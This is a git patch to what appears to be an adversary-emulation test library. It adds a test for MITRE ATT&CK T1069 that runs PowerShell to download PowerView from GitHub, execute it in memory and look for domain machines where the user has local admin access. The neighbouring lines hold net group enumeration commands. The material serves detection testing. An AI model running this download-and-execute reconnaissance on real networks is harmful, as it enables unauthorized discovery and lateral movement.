From e73b02b0b3788b044b2657e98fc9c1d35fd2ac47 Mon Sep 17 00:00:00 2001
From: Andrew Beers <apbeers@icloud.com>
Date: Thu, 21 May 2020 16:23:28 -0500
Subject: [PATCH] T1069 - Find machines where user has local admin access
 (PowerView) (#1001)

* write test

* link to specific commit of file
---
 atomics/T1069/T1069.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/atomics/T1069/T1069.yaml b/atomics/T1069/T1069.yaml
index 9e4194ca..fb5f275f 100644
--- a/atomics/T1069/T1069.yaml
+++ b/atomics/T1069/T1069.yaml
@@ -75,3 +75,16 @@ atomic_tests:
       net groups "Account Operators" /doma
       net groups "Exchange Organization Management" /doma
       net group "BUILTIN\Backup Operators" /doma
+
+- name: Find machines where user has local admin access (PowerView)
+  description: |
+    Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
+  
+  supported_platforms:
+    - windows
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-LocalAdminAccess -Verbose